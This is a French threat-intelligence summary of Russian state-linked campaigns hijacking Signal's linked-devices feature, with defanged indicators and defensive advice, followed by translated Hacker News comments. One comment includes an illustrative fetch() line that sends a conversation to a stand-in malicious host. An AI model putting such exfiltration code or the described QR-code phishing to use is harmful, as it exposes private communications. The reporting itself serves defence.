- Les comptes Signal utilisés par des personnes intéressant les services de renseignement russes sont particulièrement visés, avec une hausse des tentatives de compromission de comptes cherchant à accéder à des communications gouvernementales et militaires sensibles
- La technique la plus largement utilisée consiste à détourner la fonctionnalité légitime Linked Devices pour faire scanner un QR code malveillant, puis à synchroniser les messages en temps réel avec l’appareil de l’attaquant
- UNC5792 vise la liaison d’appareil via de fausses invitations à des groupes Signal, UNC4221 via des kits de phishing sur le thème de Kropyva et de fausses alertes de sécurité, et APT44 via l’accès à des appareils capturés
- APT44, Turla, UNC1151 lié à la Biélorussie et d’autres exploitent aussi, dans des environnements Android et Windows, des capacités de vol de bases de données Signal, de messages Signal Desktop et de pièces jointes
- Le problème ne se limite pas à Signal : WhatsApp et Telegram sont également ciblés par des méthodes similaires, d’où la nécessité de mettre à jour les applications, de vérifier les appareils liés, de se méfier des QR codes et d’utiliser un verrouillage d’écran robuste
Activité liée à la Russie visant les comptes Signal
- Le Google Threat Intelligence Group (GTIG) a confirmé que plusieurs acteurs de la menace liés à l’État russe intensifient leurs tentatives de compromission de comptes Signal Messenger
- Les principales cibles sont des personnes intéressant les services de renseignement russes ; depuis la nouvelle invasion de l’Ukraine, les besoins en temps de guerre pour accéder à des communications gouvernementales et militaires sensibles ont accru cette activité
- Signal étant une messagerie sécurisée utilisée par des militaires, des responsables politiques, des journalistes, des militants et des communautés à haut risque, elle constitue une cible à forte valeur pour les activités de surveillance et de renseignement
- Des menaces similaires s’étendent à d’autres messageries populaires comme WhatsApp et Telegram, des groupes liés à la Russie y appliquant des techniques comparables
- Les dernières versions Android et iOS de Signal incluent des renforcements destinés à aider à contrer des campagnes de phishing similaires
- Les utilisateurs doivent mettre à jour l’application vers la dernière version pour bénéficier de ces fonctionnalités
Détournement de la fonctionnalité Linked Devices
- La technique la plus récente et la plus largement utilisée consiste à détourner linked devices, une fonctionnalité légitime de Signal
- Pour utiliser Signal simultanément sur plusieurs appareils, la liaison d’un appareil supplémentaire exige généralement de scanner un QR code
- L’acteur de la menace crée un QR code malveillant qui, s’il est scanné par la victime, lie à son compte une instance Signal contrôlée par l’attaquant
- Une fois la liaison réussie, les messages suivants sont synchronisés en temps réel à la fois vers la victime et vers l’attaquant, ce qui permet de continuer à espionner des conversations sécurisées sans compromettre entièrement l’appareil
- Dans le phishing à distance, les QR codes malveillants sont principalement déguisés en :
- invitations à des groupes Signal
- alertes de sécurité
- instructions légitimes d’appairage d’appareil sur le site de Signal
- Dans les campagnes de phishing à distance plus personnalisées, le QR code malveillant de liaison d’appareil est inséré dans une page de phishing ressemblant à une application spécialisée utilisée par l’armée ukrainienne
- La même méthode est aussi utilisée dans des opérations d’accès de proximité
- APT44 permet aux forces russes déployées sur le champ de bataille de lier les comptes Signal d’appareils capturés à une infrastructure contrôlée par l’attaquant pour une exploitation ultérieure
- La compromission de compte via un appareil nouvellement lié tend à devenir un accès initial à faible signal, faute de mécanismes centralisés suffisants de détection et de défense techniques
- En cas de succès, la compromission risque de rester longtemps inaperçue
UNC5792 : invitations à des groupes Signal modifiées
- UNC5792 est un cluster soupçonné de mener des activités de renseignement russes et présente des recoupements partiels avec UAC-0195 de CERT-UA
- Ce groupe modifie des pages légitimes group invite de Signal pour les utiliser dans des campagnes de phishing
- Dans le flux normal, l’utilisateur est redirigé vers un groupe Signal, mais la page modifiée l’envoie vers une URL malveillante qui lie un appareil contrôlé par l’attaquant au compte Signal de la victime
- L’infrastructure contrôlée par l’attaquant est configurée pour ressembler à une invitation légitime à un groupe Signal
- Le JavaScript de la fausse invitation de groupe remplace la redirection habituelle de participation à un groupe Signal par un bloc malveillant contenant une URI Signal de liaison d’un nouvel appareil sous la forme
sgnl://linkdevice?uuid= - Le domaine
signal-groups[.]techa été observé comme exemple
UNC4221 : kits de phishing Signal personnalisés
- UNC4221 est un acteur de la menace lié à la Russie suivi par CERT-UA sous le nom UAC-0185, et cible activement les comptes Signal utilisés par des militaires ukrainiens
- Ce groupe exploite un kit de phishing Signal personnalisé ressemblant à des composants de l’application Kropyva, utilisée par l’armée ukrainienne pour le guidage de l’artillerie
- Comme UNC5792, UNC4221 dissimule la fonctionnalité de liaison d’appareil derrière ce qui ressemble à une invitation à un groupe Signal envoyée par un contact de confiance
- Les variantes observées du kit de phishing prennent plusieurs formes
- un site de phishing qui redirige la victime vers une infrastructure de phishing secondaire ressemblant aux instructions légitimes de liaison d’appareil fournies par Signal
- un site intégrant directement un QR code malveillant de liaison d’appareil dans le kit de phishing de base sur le thème de Kropyva
- une page de phishing conçue, lors des premières opérations de 2022, pour ressembler à une alerte de sécurité légitime de Signal
- Les domaines et pages observés incluent notamment
signal-confirm[.]site,teneta.add-group[.]siteetsignal-protect[.]host - UNC4221 utilise également une charge utile JavaScript légère appelée PINPOINT comme composant clé du ciblage de Signal
- PINPOINT collecte des informations utilisateur de base et des données de localisation via l’API GeoLocation du navigateur
- Dans de futures opérations similaires, les messages sécurisés et les données de localisation risquent d’être ciblés conjointement
- Ces deux types de données sont particulièrement visés ensemble dans le contexte d’opérations de surveillance ciblée ou de soutien à des opérations militaires conventionnelles
Activités liées à la Russie et à la Biélorussie pour voler des messages Signal
- Outre la liaison d’appareils supplémentaires aux comptes des victimes, plusieurs acteurs de la menace régionaux connus exploitent des capacités de vol de fichiers de base de données Signal sur des appareils Android et Windows
- APT44 utilise un script Windows Batch léger appelé WAVESIGN
- Il interroge périodiquement la base de données Signal de la victime pour récupérer des messages Signal
- Il exfiltre les messages récents via Rclone
- Le malware Android Infamous Chisel, rapporté en 2023 par le Security Service of Ukraine (SSU) ukrainien et le National Cyber Security Centre (NCSC) britannique, est attribué à Sandworm
- Il est conçu pour rechercher récursivement, sur les appareils Android, une liste d’extensions de fichiers incluant notamment les bases de données locales de plusieurs applications de messagerie, dont Signal
- Turla est un acteur de la menace russe attribué au Center 16 du FSB russe
- Après compromission, il utilise dans les environnements Windows un script PowerShell léger qui prépare l’exfiltration de messages Signal Desktop
- UNC1151, lié à la Biélorussie, utilise l’utilitaire en ligne de commande Robocopy
- Il prépare à l’exfiltration ultérieure le contenu du répertoire de fichiers où Signal Desktop stocke les messages et les pièces jointes
Mesures de défense pour les utilisateurs de messageries sécurisées
- La focalisation de plusieurs acteurs de la menace sur Signal montre que les menaces visant les applications de messagerie sécurisée pourraient s’intensifier à court terme
- Avec la croissance de l’industrie des spywares commerciaux et l’augmentation des variantes de malwares mobiles utilisées dans les zones de conflit, la demande en capacités cyber offensives destinées à surveiller les communications sensibles augmente
- La menace ne se limite pas aux opérations cyber à distance comme le phishing et la livraison de malwares
- Les opérations d’accès de proximité, lorsque l’attaquant peut accéder brièvement à un appareil déverrouillé de la cible, représentent aussi un risque important
- Outre Signal, WhatsApp et Telegram figurent aussi parmi les priorités de ciblage récentes de plusieurs groupes liés à la Russie
- Microsoft Threat Intelligence a traité, dans un récent billet de blog, une campagne dans laquelle COLDRIVER, UNC4057 et Star Blizzard ont tenté de détourner la fonctionnalité Linked Devices pour compromettre des comptes WhatsApp
- Les utilisateurs susceptibles d’être ciblés par des intrusions soutenues par un État devraient adopter les pratiques de défense suivantes
- Activer un verrouillage d’écran sur tous les appareils mobiles et utiliser un mot de passe long et complexe combinant majuscules, minuscules, chiffres et symboles
- Android prend en charge les mots de passe alphanumériques, qui offrent une sécurité nettement supérieure aux codes PIN numériques ou aux schémas
- Installer les mises à jour du système d’exploitation dès que possible et maintenir Signal ainsi que les autres applications de messagerie toujours à jour
- Laisser activé Google Play Protect, activé par défaut sur les appareils Android disposant de Google Play Services
- Vérifier régulièrement, dans la section « Linked devices » des paramètres de l’application, qu’aucun appareil non autorisé n’est présent
- Se méfier des QR codes et ressources web qui ressemblent à des mises à jour logicielles, des invitations de groupe ou d’autres notifications et incitent à agir immédiatement
- Lorsque c’est possible, utiliser une authentification à deux facteurs — empreinte digitale, reconnaissance faciale, clé de sécurité ou code à usage unique — pour valider une connexion de compte ou la liaison d’un nouvel appareil
- Les utilisateurs d’iPhone préoccupés par une surveillance ciblée ou des activités de renseignement devraient envisager d’activer le Lockdown Mode afin de réduire la surface d’attaque
Indicateurs de compromission et résumé des techniques observées
- Afin d’aider les organisations dans la chasse aux menaces et l’identification, des indicateurs de compromission sont inclus dans une GTI Collection destinée aux utilisateurs enregistrés
- Exemples d’indicateurs de compromission associés
- UNC5792 :
e078778b62796bab2d7ab2b04d6b01bf, exemple de code HTML d’invitation de groupe modifiée - Pages de phishing UNC5792 de fausses invitations de groupe :
add-signal-group[.]com,add-signal-groups[.]com,group-signal[.]com,groups-signal[.]site,signal-device-off[.]online,signal-group-add[.]com,signal-group[.]site,signal-group[.]tech,signal-groups-add[.]com,signal-groups[.]site,signal-groups[.]tech,signal-security[.]online,signal-security[.]site,signalgroup[.]site,signals-group[.]com - Pages de phishing UNC4221 d’instructions de liaison d’appareil :
signal-confirm[.]site,confirm-signal[.]site - Fausse alerte de sécurité Signal d’UNC4221 :
signal-protect[.]host - Fausses invitations à des groupes Kropyva d’UNC4221 :
teneta.join-group[.]online,teneta.add-group[.]site,group-teneta[.]online,helperanalytics[.]ru,teneta[.]group,group.kropyva[.]site - APT44 :
150.107.31[.]194:18000, QR codes de liaison d’appareil générés dynamiquement fournis par APT44 - Scripts Batch WAVESIGN d’APT44 :
a97a28276e4f88134561d938f60db495,b379d8f583112cad3cf60f95ab3a67fd,b27ff24870d93d651ee1d8e06276fa98
- UNC5792 :
- Les tactiques et techniques observées par acteur de la menace sont les suivantes
- UNC5792 : phishing à distance avec de fausses invitations de groupe pour appairer les messages Signal de la victime avec un appareil contrôlé par l’attaquant
- UNC4221 : phishing à distance avec de fausses applications web militaires et alertes de sécurité pour appairer les messages Signal de la victime avec un appareil contrôlé par l’attaquant
- APT44 : exploitation d’appareils auxquels un accès physique a été obtenu pour appairer les messages Signal de la victime avec un appareil contrôlé par l’attaquant
- APT44 : tentative d’exfiltration de fichiers de base de données Signal via le malware Android Infamous Chisel
- APT44 : exfiltration périodique de messages Signal récents via Rclone au moyen de scripts Windows Batch
- Turla : activités de vol de bases de données Signal Desktop après compromission d’environnements Windows
- UNC1151 : préparation à l’exfiltration des répertoires de fichiers Signal Desktop via Robocopy
2 commentaires
C’est certes vulnérable, mais voir Telegram — qui ne chiffre même pas correctement les discussions de groupe — faire la leçon sur la sécurité, c’est assez risible.
Avis sur Hacker News
Les applications qui, comme Signal, disposent d’un workflow d’appareils liés sont risquées depuis un bon moment
Telegram avait déjà pointé ce problème l’an dernier lorsqu’il critiquait Signal (https://news.ycombinator.com/context?id=40303736), et je pense que l’implémentation des appareils liés de Signal pose problème depuis longtemps : https://eprint.iacr.org/2021/626.pdf
Ce qui est plutôt surprenant, c’est qu’il ait fallu autant de temps pour que des cas d’attaque réels apparaissent dans la littérature publique. Le fait que Signal ait considéré cette attaque comme hors de son modèle de menace n’a pas aidé non plus. Selon l’article, Signal a reçu le signalement le 20 octobre 2020 et a répondu le 28 octobre qu’il n’incluait pas la compromission de clés secrètes à long terme dans son modèle d’adversaire
Dans ce cas, il faudrait avoir eu un accès physique à l’un des appareils de la victime, ou disposer d’une autre porte dérobée ; à ce stade, n’a-t-on pas déjà perdu ? Corrigez-moi si je me trompe. La sécurité matérielle physique et la prévention du phishing restent, à mon avis, essentielles
Hors laboratoire, les moyens de l’obtenir se résument généralement à obtenir un accès root à l’appareil de l’utilisateur, ou à voler une sauvegarde récente de ses conversations. La campagne découverte par Google relève davantage du phishing et est donc techniquement moins grave, mais savoir comment avertir l’utilisateur qu’il est en train d’effectuer une action dangereuse est un problème difficile qui touche à toute la sécurité de l’usage. Cela deviendra encore plus important dans Signal quand l’ajout d’un nouvel appareil lié commencera à copier l’historique des messages ainsi que les pièces jointes des 45 derniers jours
Ce que je ressens de plus en plus ces temps-ci, c’est que le chiffrement de bout en bout exige, au final, que le client puisse être compilé et vérifié directement par l’utilisateur final.
Je construis un service de chat IA chiffré fondé sur des CRDT chiffrés, mais il suffit d’ajouter une ligne
fetchou un tracker d’analyse côté rendu pour que la sécurité promise par le protocole devienne inutile. Plus loin encore, il faut aussi faire confiance au système d’exploitation sur lequel s’exécute le rendu.Même si l’on rend le client open source et compilable de façon reproductible, il faut le distribuer via l’iOS Store, et n’importe quoi peut arriver pendant le processus de publication. Je prends iOS en exemple parce qu’il est particulièrement difficile d’y installer une app compilée soi-même. Dans un chat à plusieurs, les interlocuteurs doivent eux aussi passer par le même processus.
On peut utiliser toutes sortes de protocoles élégants et le meilleur chiffrement de transport possible, au bout du compte tout est une question de confiance. Avec quelque chose comme Signal, je crains que l’on devienne au contraire une cible de surveillance sous l’illusion d’un environnement totalement sûr. Si une agence gouvernementale veut surveiller, elle concentrera probablement ses ressources sur les utilisateurs de Signal, qui ont le plus de choses à cacher.
Parfois, tout me semble vain, sauf le stockage chiffré. Je trouve aussi étrange que l’essentiel des discussions reste centré sur la validité mathématique des protocoles de sécurité. Une seule ligne dans la couche de rendu,
fetch("[https://malvevolentactor.com](<https://malvevolentactor.com>)", {body: JSON.stringify(convo)}), peut tout contourner ; je serais curieux de savoir ce que vous en pensez.Supprimer la confiance semble impossible ; on ne fait que déplacer ce à quoi l’on fait confiance, ou le cacher derrière une abstraction. Ce qui deviendra plus important à l’avenir, ce sont les mécanismes permettant de prouver clairement qu’une entité à laquelle on a accordé un certain niveau de confiance a agi de manière malveillante, et de la rendre responsable.
Par exemple, les journaux de transparence des certificats qui empêchent les attaques de l’homme du milieu, les builds reproductibles qui permettent de vérifier que le binaire reçu correspond bien au code open source public, ou encore la transparence des clés dans WhatsApp/Signal/iMessage pour vérifier que l’on reçoit bien la clé publique attendue et non une clé de la NSA.
Un système qui cherche à être trop sûr peut finir par empêcher l’utilisateur de lire ses propres messages, et le pousser vers un système finalement moins sûr. Avec Matrix aussi, il y a eu des problèmes parce que les clients n’indiquaient pas clairement qu’en se déconnectant, on pouvait perdre définitivement des messages.
Certaines exigences fortes, comme la confidentialité persistante parfaite, peuvent entrer en conflit en pratique avec ce que les utilisateurs attendent de la messagerie. Ce qu’ils veulent, c’est « je peux voir mes messages quand je veux, et personne d’autre ne peut jamais les voir », mais c’est très difficile. Il existe une tension fondamentale entre sécurité, réinitialisation de mot de passe et récupération après la perte d’un téléphone.
Si les gens comprenaient pleinement les conséquences possibles, beaucoup ne voudraient peut-être pas le chiffrement de bout en bout le plus fort. Ils pourraient préférer de solides garanties juridiques du type « si quelqu’un lit mes messages, il va en prison à vie ». Certains veulent bien sûr le plus haut niveau de sécurité technique, mais si l’on conçoit le système autour de cette priorité, cela peut se retourner contre les utilisateurs qui n’acceptent pas ces compromis.
Quelqu’un qui se soucie de ce niveau de sécurité fera l’effort d’utiliser autre chose qu’un iPhone. Quand les partisans de Signal traitent de LARPers les utilisateurs de systèmes cryptographiques qui ne leur plaisent pas, cela ressemble à une projection typique. À part peut-être les personnes qui travaillent pour le gouvernement américain, je ne vois pas très bien à quel modèle de menace Signal correspond réellement.
Il y a clairement aussi un effet lampadaire chez les chercheurs universitaires en cryptographie, qui se concentrent sur les algorithmes mathématiques. Aujourd’hui, le périmètre finançable en recherche sur la sécurité s’est un peu élargi et inclut jusqu’aux modèles jouets de protocoles de messagerie de bout en bout, mais il reste insuffisant pour couvrir l’ensemble du trajet humain à humain qui compte vraiment.
Fondamentalement, une racine de confiance signe quelque chose pour confirmer sans ambiguïté de quel téléphone + système d’exploitation + application provient l’entité avec laquelle on interagit.
Android dispose de cela et peut, par exemple, confirmer à un tiers qu’un bootloader verrouillé, une signature Google et un système d’exploitation Google sont en cours d’exécution. En théorie, il serait aussi possible d’avoir une autre chaîne de confiance et de faire accepter à un interlocuteur distant un logiciel « d’origine » comme un téléphone Google + Lineage OS.
Les apps peuvent aussi vérifier la signature de l’app accessible par le système d’exploitation et, si nécessaire, la fournir à l’interlocuteur distant. Pour produire des artefacts d’attestation entièrement transparents qui ne reposent pas sur une confiance aveugle envers une entité unique comme Google, on pourrait utiliser, plutôt qu’une racine de confiance de signature, un registre contenant les hashs et les binaires des composants à vérifier.
Tout cela est techniquement possible, mais ce n’est pas implémenté aujourd’hui d’une manière réellement utilisable. S’il y a suffisamment d’intérêt, je pense que cela finira par l’être.
À l’époque, rien n’était chiffré, faire quoi que ce soit sur un Wi-Fi public relevait de la roulette russe, et les agences de renseignement d’origine électromagnétique vivaient un âge d’or. À ce moment-là, le chiffrement réseau était une priorité plus élevée.
Ce n’est pas écrit explicitement dans l’article, mais si j’ai bien compris, l’une des premières étapes d’une attaque consiste à récupérer le smartphone d’un soldat tué au combat.
En cas de succès, les messages suivants sont transmis en temps réel à la fois à la victime et à l’attaquant.
Mais le smartphone fournit à chaque soldat une puissante plateforme de calcul et de communication, utilisable sans formation spécifique. Le problème est de savoir comment la rendre sûre, y compris face aux risques évoqués dans le commentaire parent.
J’imagine que quelqu’un travaille à des moyens de la protéger suffisamment pour que même les services de renseignement russes ne puissent pas l’exploiter efficacement. Si ce type de solution se généralise, il pourrait aussi très bien s’appliquer à la vie privée des civils. Protéger les téléphones des civils ukrainiens contre des attaquants russes n’est pas non plus une mauvaise idée.
Si l’on parle du fait qu’un appareil peut être lié simplement en scannant une fois un QR code, j’ai l’impression que c’est bien une faille
Il ne devrait pas être possible de lier un appareil juste en scannant le code ; il faudrait une confirmation manuelle du type « Oui, je veux lier cet appareil ». Ainsi, même si l’on scanne en pensant qu’il s’agit d’un code d’invitation à un groupe, on peut se rendre compte que ce n’est pas le cas. Bien sûr, il faut toujours que l’utilisateur le remarque, mais c’est une amélioration significative par rapport à « j’ai scanné en pensant que c’était un code pour rejoindre un groupe, et un autre appareil a été lié silencieusement »
Beaucoup d’utilisateurs ne comprennent pas vraiment les QR codes, les liens ou les associations d’appareils, et n’y réfléchissent pas en profondeur. Ils font une supposition immédiate et instinctive, puis appuient, souvent pour faire disparaître l’écran et revenir à ce qu’ils faisaient. Je ne sais pas s’il y a de quoi affirmer qu’il n’existe pas de procédure de confirmation ; la documentation de Signal devrait permettre de le vérifier
Article lié : https://www.wired.com/story/russia-signal-qr-code-phishing-a... (https://web.archive.org/web/20250219110740/https://www.wired..., https://archive.ph/MbR9e)
Je l’ai vu via https://news.ycombinator.com/item?id=43103692, mais il n’y a pas de commentaires là-bas
La bonne nouvelle, c’est qu’il y a une raison pour laquelle Signal est ciblé. Cela veut dire que Signal reste efficace
Beaucoup de voix veulent dire que Signal a été compromis, mais dans presque tous les cas il faut voir que ces alternatives sont moins open source que Signal
Signal fait de son mieux pour défendre les droits humains tout en devenant une entreprise à l’échelle du web. La dignité individuelle compte. Ce n’est pas une simple conversation
J’ai jeté un coup d’œil aux membres du conseil d’administration sur le site de la Signal Foundation, et j’y ai vu des mentions comme Council on Foreign Relations, World Economic Forum Young Global Leader, Truman National Security Project security fellow, ou Foreign Affairs Policy Board du U.S. Department of State
Ces personnes donnent l’impression de faire partie du monde du renseignement. Je me demande ce qu’elles font exactement au conseil d’administration de Signal, une app de messagerie open source. Je suis d’accord sur le fait que ce n’est pas une simple conversation
Si Signal est sûr, ceux qui attaquent la vie privée voudront que les gens croient que Signal est compromis et utilisent autre chose. S’il ne l’est pas, ils voudront au contraire que les gens croient que Signal est sûr
À mon avis, la solution est d’ignorer complètement les sources potentielles de désinformation, en particulier les utilisateurs quelconques des réseaux sociaux. HN inclus. C’est difficile quand le centre social se trouve sur ces plateformes, et il faut s’en exclure soi-même. Il faut se limiter aux voix légitimes et fiables
« MongoDB est à l’échelle du web. Il suffit de l’allumer et ça passe à l’échelle tout seul »
Dans le menu des paramètres, on peut vérifier s’il y a des appareils liés inattendus
Un petit indicateur du type « 3 appareils liés actifs » suffirait
Certains domaines ont été fournis, mais tous ne sont pas enregistrés
Par exemple,
signal-protect[.]hostetkropyva[.]sitesont disponibles, tandis quesignal-confirm[.]siteest enregistré en Ukraine. Certains sont enregistrés en RussieIl ne faut faire confiance à aucun pays en guerre, quel que soit le camp. A accuse B, B accuse A, mais les deux ont leur propre agenda
signal-confirm[.]siteest enregistré en Ukraine, les données WHOIS sont souvent fausses, donc il est difficile de s’appuyer là-dessusLa Russie est connue pour utiliser dans ce genre d’opérations des identifiants ou des cartes SIM volés dans des pays voisins, y compris l’Ukraine
Malheureusement, les acteurs étatiques russes n’ont pas non plus de problème à opérer depuis l’intérieur de l’Ukraine. Ajoutez à cela des criminels opportunistes qui suivent celui qui paie le mieux, ainsi que des personnes qui font quotidiennement l’aller-retour entre les territoires temporairement occupés par la Russie et l’Ukraine, et cela devient vite complexe